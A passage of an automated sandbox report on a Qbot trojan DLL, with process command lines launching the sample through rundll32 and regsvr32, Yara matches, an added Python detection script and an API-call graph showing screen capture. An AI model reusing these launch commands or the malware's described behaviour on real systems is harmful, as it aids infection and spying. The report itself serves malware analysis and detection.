          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          Target ID:5
          Start time:17:39:51
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer
          Imagebase:0x170000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          Target ID:6
          Start time:17:39:54
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer
          Imagebase:0x170000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:7
          Start time:17:39:56
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\wermgr.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\wermgr.exe
          Imagebase:0x1340000
          File size:191904 bytes
          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          Target ID:8
          Start time:17:39:56
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\wermgr.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\wermgr.exe
          Imagebase:0x1340000
          File size:191904 bytes
          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          Target ID:9
          Start time:17:39:56
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\wermgr.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\wermgr.exe
          Imagebase:0x1340000
          File size:191904 bytes
          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          Target ID:10
          Start time:17:39:57
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable
          Imagebase:0x170000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:33
          Start time:17:42:12
          Start date:03/10/2022
          Path:C:\Windows\System32\audiodg.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\AUDIODG.EXE 0x2ac
          Imagebase:0x7ff724e50000
          File size:594128 bytes
          MD5 hash:0B245353F92DF527AA7613BA2C0DA023
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
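The process list above shows how the DLL was driven: regsvr32.exe /s and rundll32.exe each load pebbles.dat.dll from the user's Desktop, one rundll32.exe invocation calls export #1 by ordinal, rundll32.exe is also launched against the DllRegisterServer and bewailable exports, and three wermgr.exe instances appear a few seconds later with the same Qbot Yara matches in their memory as the rundll32.exe and regsvr32.exe hosts. The script below is an added example, not part of this report and not a Joe Sandbox or Sigma rule; it encodes those observations as process-creation checks and runs them over an event list constructed from the command lines above. The pids are the report's Target IDs; the parent-child links are assumed (the report does not list parents for these processes), and the user-writable-directory list and the extension heuristic are this example's own.

```python
import ntpath
import re

DLL_HOSTS = {"rundll32.exe", "regsvr32.exe"}
# Locations a standard user can write to; this list is the example's own.
USER_WRITABLE = ("c:\\users\\", "\\appdata\\", "\\temp\\", "c:\\programdata\\")
PATH_RE = re.compile(r'[A-Za-z]:\\[^",]+')      # first drive-letter path on the line
ORDINAL_RE = re.compile(r',\s*#\d+')            # rundll32 ... ,#1 style export call


def dll_path(cmdline):
    """Extract the DLL path a rundll32/regsvr32 command line refers to."""
    m = PATH_RE.search(cmdline)
    return m.group(0).strip() if m else None


def check_event(ev, by_pid):
    """Return the sorted rule names one process-creation event trips."""
    hits = set()
    image = ntpath.basename(ev["image"]).lower()
    parent = by_pid.get(ev["ppid"])
    parent_image = ntpath.basename(parent["image"]).lower() if parent else ""
    if image in DLL_HOSTS:
        path = dll_path(ev["cmdline"])
        if path:
            low = path.lower()
            if any(marker in low for marker in USER_WRITABLE):
                hits.add("dll_from_user_path")
            parts = ntpath.basename(low).split(".")
            # pebbles.dat.dll style double extension, or a non-.dll file name;
            # noisy for legitimately dotted names, so treat it as a triage hint.
            if len(parts) > 2 or parts[-1] != "dll":
                hits.add("dll_spoofed_extension")
        if ORDINAL_RE.search(ev["cmdline"]):
            hits.add("ordinal_export")
    # wermgr.exe is normally started by a service host, not by a DLL host.
    if image == "wermgr.exe" and parent_image in DLL_HOSTS:
        hits.add("wermgr_spawned_by_dll_host")
    return sorted(hits)


def evaluate(events):
    """Map pid -> rule names for every event that trips at least one rule."""
    by_pid = {ev["pid"]: ev for ev in events}
    result = {}
    for ev in events:
        hits = check_event(ev, by_pid)
        if hits:
            result[ev["pid"]] = hits
    return result


# Constructed from the command lines in the process list; pids are the report's
# Target IDs and the ppid links are assumed (the report does not list parents).
SAMPLE_EVENTS = [
    {"pid": 0, "ppid": 99, "image": r"C:\Windows\System32\loaddll32.exe",
     "cmdline": r'loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll"'},
    {"pid": 1, "ppid": 0, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 2, "ppid": 0, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1'},
    {"pid": 3, "ppid": 0, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll"},
    {"pid": 4, "ppid": 2, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1'},
    {"pid": 5, "ppid": 0, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer"},
    {"pid": 7, "ppid": 5, "image": r"C:\Windows\SysWOW64\wermgr.exe",
     "cmdline": r"C:\Windows\SysWOW64\wermgr.exe"},
    {"pid": 33, "ppid": 99, "image": r"C:\Windows\System32\audiodg.exe",
     "cmdline": r"C:\Windows\system32\AUDIODG.EXE 0x2ac"},
]

if __name__ == "__main__":
    for pid, rules in sorted(evaluate(SAMPLE_EVENTS).items()):
        print("pid %-3d %s" % (pid, ", ".join(rules)))
```

The rules key on the image name of the event, so cmd.exe (Target ID 2) does not fire even though its command line contains the rundll32 string; the rundll32.exe child it spawns is the one that should. The wermgr.exe rule only works when parent linkage is available in the telemetry, which is why the constructed events carry a ppid field.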


            Execution Graph

            Execution Coverage:6.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:4.6%
            Total number of Nodes:2000
            Total number of Limit Nodes:58
execution_graph: [node and edge dump of the interactive graph omitted; it is not readable as text. What the node labels preserve: the graphed code sits at addresses in the 0x991000-0x9a4000 range, matching the 0x990000 base of the memory region in regsvr32.exe (Target ID 3) where the Qbot Yara rules matched, and the API names attached to nodes are RtlAllocateHeap, GetSystemTimeAsFileTime, GetTickCount, _time64, GetCurrentProcessId, GetModuleHandleW, GetProcAddress, SwitchToThread, GetLastError, CoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoSetProxyBlanket, SysAllocString, SysFreeString, VariantClear, lstrlenW, lstrcpynA, memset, memchr, strncpy, strchr, _snprintf, qsort, strtod, _strtoi64, _errno, localeconv and __aulldiv. The COM calls (CoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoSetProxyBlanket, SysAllocString, SysFreeString, VariantClear) do not appear in the static import table above, which lists only KERNEL32.dll, ADVAPI32.dll and SHLWAPI.dll; the GetModuleHandleW node at 9a2951 followed by three GetProcAddress calls shows them being resolved at run time.]
API calls 13724->13725 13726 998156 13725->13726 13727 998927 strncpy 13726->13727 13728 99816f 13727->13728 13729 998927 strncpy 13728->13729 13730 998183 13729->13730 13731 998927 strncpy 13730->13731 13732 998194 13731->13732 13733 998927 strncpy 13732->13733 13734 9981a7 13733->13734 13735 998927 strncpy 13734->13735 13736 9981bd 13735->13736 13737 998927 strncpy 13736->13737 13738 9981d1 13737->13738 13739 998927 strncpy 13738->13739 13740 9981ea 13739->13740 13741 998927 strncpy 13740->13741 13742 9981fe 13741->13742 13743 998927 strncpy 13742->13743 13744 998212 13743->13744 13745 998927 strncpy 13744->13745 13746 998226 13745->13746 13747 998927 strncpy 13746->13747 13748 99823c 13747->13748 13749 998927 strncpy 13748->13749 13750 998253 13749->13750 13880 998983 13750->13880 13753 998927 strncpy 13754 998266 13753->13754 13755 998927 strncpy 13754->13755 13756 99827a 13755->13756 13757 998927 strncpy 13756->13757 13758 99828e 13757->13758 13759 998983 5 API calls 13758->13759 13760 998296 13759->13760 13761 998927 strncpy 13760->13761 13762 9982a1 13761->13762 13763 998983 5 API calls 13762->13763 13764 9982a9 13763->13764 13765 998927 strncpy 13764->13765 13766 9982b4 13765->13766 13767 998983 5 API calls 13766->13767 13768 9982bc 13767->13768 13769 998927 strncpy 13768->13769 13770 9982c7 13769->13770 13771 998927 strncpy 13770->13771 13772 9982db 13771->13772 13773 998983 5 API calls 13772->13773 13774 9982e3 13773->13774 13775 998927 strncpy 13774->13775 13776 9982ee 13775->13776 13777 998927 strncpy 13776->13777 13778 998308 13777->13778 13779 998983 5 API calls 13778->13779 13780 998310 13779->13780 13781 998927 strncpy 13780->13781 13782 99831b 13781->13782 13783 998927 strncpy 13782->13783 13784 99832f 13783->13784 13785 998927 strncpy 13784->13785 13786 998343 13785->13786 13787 998983 5 API calls 13786->13787 13788 998357 13787->13788 13789 998927 strncpy 13788->13789 13790 998362 13789->13790 13791 998927 strncpy 13790->13791 13792 998376 
13791->13792 13793 998927 strncpy 13792->13793 13794 99838a 13793->13794 13795 998983 5 API calls 13794->13795 13796 998395 13795->13796 13797 998927 strncpy 13796->13797 13798 9983a0 13797->13798 13799 998983 5 API calls 13798->13799 13885 999b62 13880->13885 13882 998996 13883 99825b 13882->13883 13884 998ddf 2 API calls 13882->13884 13883->13753 13884->13883 13886 999b71 WideCharToMultiByte 13885->13886 13893 999bc1 13885->13893 13887 999b8c 13886->13887 13886->13893 13894 998dc9 RtlAllocateHeap 13887->13894 13889 999b95 13890 999b9d WideCharToMultiByte 13889->13890 13889->13893 13891 999bb6 13890->13891 13890->13893 13892 998ddf 2 API calls 13891->13892 13892->13893 13893->13882 13894->13889 13896 999913 13895->13896 13897 9a36d5 2 API calls 13896->13897 13898 99995d 13897->13898 13899 997ae9 13898->13899 13900 9a36d5 2 API calls 13898->13900 13899->13205 13900->13898 13902 9a11b3 7 API calls 13901->13902 13903 997f21 13902->13903 13904 998927 strncpy 13903->13904 13905 997f37 13904->13905 13906 998927 strncpy 13905->13906 13907 997f4c 13906->13907 13908 998927 strncpy 13907->13908 13909 997f60 13908->13909 13910 998927 strncpy 13909->13910 13911 997f75 13910->13911 13912 998927 strncpy 13911->13912 13913 997f86 13912->13913 13914 998927 strncpy 13913->13914 13915 997f9f 13914->13915 13916 998927 strncpy 13915->13916 13917 997fb5 13916->13917 13918 998927 strncpy 13917->13918 13919 997fc6 13918->13919 13920 998927 strncpy 13919->13920 13921 997fda 13920->13921 13922 998927 strncpy 13921->13922 13923 997fed 13922->13923 13924 998927 strncpy 13923->13924 13925 998001 13924->13925 13926 998927 strncpy 13925->13926 13927 998020 13926->13927 13928 998983 5 API calls 13927->13928 13929 998031 13928->13929 13930 998927 strncpy 13929->13930 13931 99803c 13930->13931 13932 998983 5 API calls 13931->13932 13933 99804d 13932->13933 13934 998927 strncpy 13933->13934 13935 998058 13934->13935 13936 998927 strncpy 13935->13936 13937 998074 13936->13937 13938 9a1c34 13 API 
calls 13937->13938 13939 99807c 13938->13939 13939->13208 13941 9a1d21 18 API calls 13940->13941 13942 99795d 13941->13942 13946 997969 13942->13946 13974 99a06e 13942->13974 13944 99799d 13944->13946 13978 998dc9 RtlAllocateHeap 13944->13978 13946->13220 13947 997a75 13949 998ddf 2 API calls 13947->13949 13951 997a86 13947->13951 13948 997a21 13948->13946 13948->13947 13950 999a76 RtlAllocateHeap 13948->13950 13949->13947 13950->13948 13952 998ddf 2 API calls 13951->13952 13952->13946 13954 997826 13953->13954 13955 99bfc8 2 API calls 13954->13955 13963 9978b6 13954->13963 13956 997842 13955->13956 13956->13963 13966 99788e 13956->13966 13979 998dc9 RtlAllocateHeap 13956->13979 13958 99785f 13962 999fa5 2 API calls 13958->13962 13958->13966 13959 998ddf 2 API calls 13960 9978ac 13959->13960 13961 998ddf 2 API calls 13960->13961 13961->13963 13964 99787e 13962->13964 13963->13223 13963->13230 13980 998bbb 13964->13980 13966->13959 13996 99808f 13967->13996 13969 9977db 13970 9976f8 19 API calls 13969->13970 13971 9977fb 13970->13971 13972 998ddf 2 API calls 13971->13972 13973 997806 13972->13973 13973->13230 13975 99a07a 13974->13975 13976 99a09f 13975->13976 13977 99a093 memset 13975->13977 13976->13944 13977->13976 13978->13948 13979->13958 13983 998a4f 13980->13983 13990 9989b9 13983->13990 13986 998aa8 GetLastError 13989 998b37 13986->13989 13987 998ddf 2 API calls 13988 998a7c 13987->13988 13988->13966 13989->13987 13995 998dc9 RtlAllocateHeap 13990->13995 13992 998a2c 13992->13986 13992->13988 13992->13989 13993 998a1b lstrlenW 13993->13992 13994 9989ca 13994->13992 13994->13993 13995->13994 13997 9a11b3 7 API calls 13996->13997 13998 99809e 13997->13998 13999 998927 strncpy 13998->13999 14000 9980b4 13999->14000 14001 998927 strncpy 14000->14001 14002 9980c8 14001->14002 14003 998927 strncpy 14002->14003 14004 9980d9 14003->14004 14005 998927 strncpy 14004->14005 14006 9980ea 14005->14006 14007 998927 strncpy 14006->14007 14008 9980ff 14007->14008 14009 
998927 strncpy 14008->14009 14010 998115 14009->14010 14011 998927 strncpy 14010->14011 14012 99812b 14011->14012 14013 9a1c34 13 API calls 14012->14013 14014 998133 14013->14014 14014->13969 14015 995f94 14021 998dc9 RtlAllocateHeap 14015->14021 14017 996012 14019 99a1f8 GetSystemTimeAsFileTime 14020 995fa9 14019->14020 14020->14017 14020->14019 14022 995d1e GetDC 14020->14022 14021->14020 14023 995d50 CreateCompatibleDC 14022->14023 14047 995f3e 14022->14047 14024 995d61 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 14023->14024 14023->14047 14026 995d8c SelectObject 14024->14026 14024->14047 14025 998ddf 2 API calls 14027 995f5d 14025->14027 14028 995d9f BitBlt GetCursorInfo 14026->14028 14026->14047 14029 998ddf 2 API calls 14027->14029 14030 995dd0 14028->14030 14031 995e25 SelectObject 14028->14031 14032 995f68 14029->14032 14030->14031 14033 995dd5 CopyIcon GetIconInfo GetObjectW DrawIconEx 14030->14033 14034 995e39 GetObjectW 14031->14034 14031->14047 14035 995f6f DeleteDC 14032->14035 14036 995f76 14032->14036 14033->14031 14048 998dc9 RtlAllocateHeap 14034->14048 14035->14036 14037 995f7a DeleteDC 14036->14037 14038 995f81 14036->14038 14037->14038 14040 995f8c 14038->14040 14041 995f85 DeleteObject 14038->14041 14040->14020 14041->14040 14042 995ea2 14043 995eae GetDIBits 14042->14043 14042->14047 14049 998dc9 RtlAllocateHeap 14043->14049 14045 995ed4 14045->14047 14050 99fbfb 14045->14050 14047->14025 14048->14042 14049->14045 14060 998dc9 RtlAllocateHeap 14050->14060 14052 99fc1b 14059 99fcb3 14052->14059 14061 9a5800 14052->14061 14054 998ddf 2 API calls 14055 99fcd1 14054->14055 14055->14047 14057 998e5d 3 API calls 14058 99fc46 14057->14058 14058->14057 14058->14059 14064 9a4c20 14058->14064 14059->14054 14060->14052 14101 9a55c0 14061->14101 14063 9a581c 14063->14058 14065 9a4c31 14064->14065 14066 9a4cda 14065->14066 14075 9a4c8e 14065->14075 14112 9a5ee0 14065->14112 14066->14058 14068 9a518d 14068->14066 14076 9a524f 14068->14076 14088 
9a5ee0 memcpy 14068->14088 14069 9a4f79 memcpy 14071 9a4fa6 14069->14071 14070 9a4eb8 14070->14066 14070->14069 14070->14071 14072 9a4f01 memcpy 14070->14072 14074 9a5ee0 memcpy 14070->14074 14071->14066 14071->14068 14083 9a5ee0 memcpy 14071->14083 14072->14070 14073 9a4cf8 14073->14066 14073->14070 14078 9a5ee0 memcpy 14073->14078 14074->14070 14075->14066 14075->14073 14084 9a5ee0 memcpy 14075->14084 14085 9a5ee0 memcpy 14076->14085 14086 9a52a1 14076->14086 14087 9a52ea 14076->14087 14077 9a5ee0 memcpy 14077->14087 14078->14070 14079 9a532b 14082 9a5336 14079->14082 14090 9a533d 14079->14090 14080 9a5324 14116 9a4160 14080->14116 14138 9a5970 14082->14138 14083->14071 14084->14073 14085->14086 14086->14066 14086->14077 14087->14066 14087->14079 14087->14080 14092 9a53f3 14087->14092 14088->14068 14095 9a5329 14090->14095 14154 9a5ad0 14090->14154 14092->14066 14093 9a5ee0 memcpy 14092->14093 14094 9a54c4 14093->14094 14094->14058 14095->14066 14095->14092 14100 9a5387 14095->14100 14170 9a7180 14095->14170 14097 9a5ee0 memcpy 14097->14092 14098 9a53a3 14099 9a53ab memset 14098->14099 14098->14100 14099->14100 14100->14097 14102 9a57bd 14101->14102 14103 9a55d5 14101->14103 14102->14063 14103->14102 14106 9a5830 14103->14106 14107 9a583e 14106->14107 14108 9a57b3 14107->14108 14110 9a5f30 memset 14107->14110 14108->14063 14111 9a8994 14110->14111 14111->14108 14113 9a5ef2 14112->14113 14114 9a5f03 memcpy 14113->14114 14115 9a5f23 14113->14115 14114->14115 14115->14075 14126 9a4190 14116->14126 14117 9a42b9 14118 9a42f9 14117->14118 14119 9a42d1 memcpy 14117->14119 14124 9a4353 14117->14124 14120 9a4330 memcpy 14118->14120 14121 9a4305 memcpy 14118->14121 14119->14124 14120->14124 14121->14120 14122 9a4329 14121->14122 14122->14120 14123 9a7180 memcpy 14123->14126 14125 9a4384 14124->14125 14128 9a4407 14124->14128 14129 9a43e1 memcpy 14124->14129 14125->14095 14126->14117 14126->14123 14127 9a5ee0 memcpy 14126->14127 14131 9a4258 memcpy 14126->14131 14173 9a6020 
14126->14173 14127->14126 14130 9a6020 memcpy 14128->14130 14134 9a4444 14128->14134 14129->14128 14130->14134 14131->14126 14133 9a44e2 14133->14095 14134->14133 14135 9a7180 memcpy 14134->14135 14136 9a44d5 14135->14136 14137 9a5ee0 memcpy 14136->14137 14137->14133 14142 9a5978 14138->14142 14140 9a5a29 14143 9a5a3f 14140->14143 14146 9a5a7f 14140->14146 14153 9a5a23 14140->14153 14142->14140 14144 9a5ee0 memcpy 14142->14144 14142->14153 14177 9a5d50 14142->14177 14186 9a6ef0 14142->14186 14145 9a6ef0 memcpy 14143->14145 14144->14142 14147 9a5a5e 14145->14147 14148 9a6ef0 memcpy 14146->14148 14146->14153 14149 9a5ee0 memcpy 14147->14149 14150 9a5aa7 14148->14150 14151 9a5a6b 14149->14151 14152 9a5ee0 memcpy 14150->14152 14151->14095 14152->14153 14153->14095 14156 9a5ad9 14154->14156 14155 9a5d50 4 API calls 14155->14156 14156->14155 14157 9a5ca4 14156->14157 14158 9a5cab 14156->14158 14160 9a6ef0 memcpy 14156->14160 14163 9a5ee0 memcpy 14156->14163 14157->14095 14159 9a5cba 14158->14159 14161 9a5cfb 14158->14161 14162 9a6ef0 memcpy 14159->14162 14160->14156 14161->14157 14164 9a6ef0 memcpy 14161->14164 14165 9a5cd9 14162->14165 14163->14156 14166 9a5d23 14164->14166 14167 9a5ee0 memcpy 14165->14167 14169 9a5ee0 memcpy 14166->14169 14168 9a5ce6 14167->14168 14168->14095 14169->14157 14171 9a719a 14170->14171 14172 9a720b memcpy 14171->14172 14172->14098 14174 9a6038 14173->14174 14175 9a603e memcpy 14173->14175 14174->14126 14176 9a605e 14175->14176 14176->14126 14184 9a5d62 14177->14184 14178 9a5d7c memcpy 14178->14184 14179 9a5e67 14180 9a5ed9 14179->14180 14182 9a5ea9 14179->14182 14183 9a5e7e memset 14179->14183 14180->14142 14181 9a6020 memcpy 14181->14184 14182->14180 14185 9a5eb3 memset 14182->14185 14183->14142 14184->14178 14184->14179 14184->14181 14185->14180 14187 9a6f0a 14186->14187 14188 9a7180 memcpy 14187->14188 14189 9a6f8a 14187->14189 14188->14189 14189->14142 11205 996603 11206 996669 11205->11206 11207 996611 11205->11207 11234 998db4 
HeapCreate 11207->11234 11209 996616 11235 999787 11209->11235 11218 99666e 11255 998d9a 11218->11255 11219 996664 11220 998d9a 2 API calls 11219->11220 11220->11206 11227 9966c5 CreateThread 11227->11206 11335 9963a2 11227->11335 11228 99f0d9 8 API calls 11229 9966a0 11228->11229 11268 99647a memset 11229->11268 11234->11209 11287 998dc9 RtlAllocateHeap 11235->11287 11237 99661b 11238 9a3d36 11237->11238 11239 9a3d6b 11238->11239 11288 998e2e 11239->11288 11241 996629 11242 99f0d9 11241->11242 11292 999f6b 11242->11292 11245 99f0fb GetModuleHandleA 11247 99f10a 11245->11247 11246 99f103 LoadLibraryA 11246->11247 11250 99f118 11247->11250 11295 99f08e 11247->11295 11300 998d87 11250->11300 11252 999f85 11318 998ca3 11252->11318 11254 996650 GetFileAttributesW 11254->11218 11254->11219 11256 998da8 11255->11256 11257 996673 11255->11257 11258 998ddf 2 API calls 11256->11258 11259 99109a 11257->11259 11258->11257 11260 998ca3 2 API calls 11259->11260 11261 9910b5 11260->11261 11262 99fcda 11261->11262 11263 99fcf6 11262->11263 11267 996687 11263->11267 11324 998dc9 RtlAllocateHeap 11263->11324 11265 99fd09 11266 998ddf 2 API calls 11265->11266 11265->11267 11266->11267 11267->11227 11267->11228 11325 991080 11268->11325 11270 9964a6 11271 9964f8 11270->11271 11272 9964b7 11270->11272 11274 991080 2 API calls 11271->11274 11273 991080 2 API calls 11272->11273 11275 9964c1 11273->11275 11276 996502 11274->11276 11328 999fa5 11275->11328 11280 998d87 2 API calls 11276->11280 11278 9964d7 11279 998d87 2 API calls 11278->11279 11281 9964e2 11279->11281 11280->11281 11282 998ddf 11281->11282 11283 9966b5 11282->11283 11284 998de9 11282->11284 11283->11227 11284->11283 11285 998f63 memset 11284->11285 11286 998e19 HeapFree 11285->11286 11286->11283 11287->11237 11291 998dc9 RtlAllocateHeap 11288->11291 11290 998e3f 11290->11241 11291->11290 11304 998bcd 11292->11304 11311 998dc9 RtlAllocateHeap 11295->11311 11297 99f0cf 11297->11250 11298 99f0a0 11298->11297 11312 99ef38 
11298->11312 11301 998d8f 11300->11301 11303 99663f 11300->11303 11302 998ddf 2 API calls 11301->11302 11302->11303 11303->11252 11305 998c05 11304->11305 11307 998be4 11304->11307 11306 998c4c lstrlenW 11305->11306 11308 998c58 11305->11308 11306->11308 11307->11305 11310 998dc9 RtlAllocateHeap 11307->11310 11308->11245 11308->11246 11310->11305 11311->11298 11313 99ef51 11312->11313 11314 99efac 11312->11314 11313->11314 11315 99f004 LoadLibraryA 11313->11315 11314->11298 11315->11314 11316 99f012 GetProcAddress 11315->11316 11316->11314 11317 99f01e 11316->11317 11317->11314 11319 998cc4 lstrlenW 11318->11319 11323 998dc9 RtlAllocateHeap 11319->11323 11322 998d4b 11322->11254 11322->11322 11323->11322 11324->11265 11326 998bcd 2 API calls 11325->11326 11327 991096 11326->11327 11327->11270 11332 998f63 11328->11332 11331 999fd3 11331->11278 11333 998f7d _vsnprintf 11332->11333 11334 998f6c memset 11332->11334 11333->11331 11334->11333 11347 99651e 11335->11347 11339 9963bd 11340 9963b3 11340->11339 11341 9963ed 11340->11341 11409 99d889 11340->11409 11343 996424 11341->11343 11344 99641d 11341->11344 11343->11339 11449 993597 11343->11449 11425 9961e8 11344->11425 11348 99f0d9 8 API calls 11347->11348 11349 996532 11348->11349 11350 99f0d9 8 API calls 11349->11350 11351 99654b 11350->11351 11352 99f0d9 8 API calls 11351->11352 11353 996564 11352->11353 11354 99f0d9 8 API calls 11353->11354 11355 99657d 11354->11355 11356 99f0d9 8 API calls 11355->11356 11357 996598 11356->11357 11358 99f0d9 8 API calls 11357->11358 11359 9965b1 11358->11359 11360 99f0d9 8 API calls 11359->11360 11361 9965ca 11360->11361 11362 99f0d9 8 API calls 11361->11362 11363 9965e3 11362->11363 11364 99f0d9 8 API calls 11363->11364 11365 9963a7 GetOEMCP 11364->11365 11366 99dfc2 11365->11366 11456 998dc9 RtlAllocateHeap 11366->11456 11368 99dfdd 11369 99dfe8 GetCurrentProcessId 11368->11369 11408 99e33d 11368->11408 11370 99e000 11369->11370 11457 99ca0a 11370->11457 11372 99e053 11373 
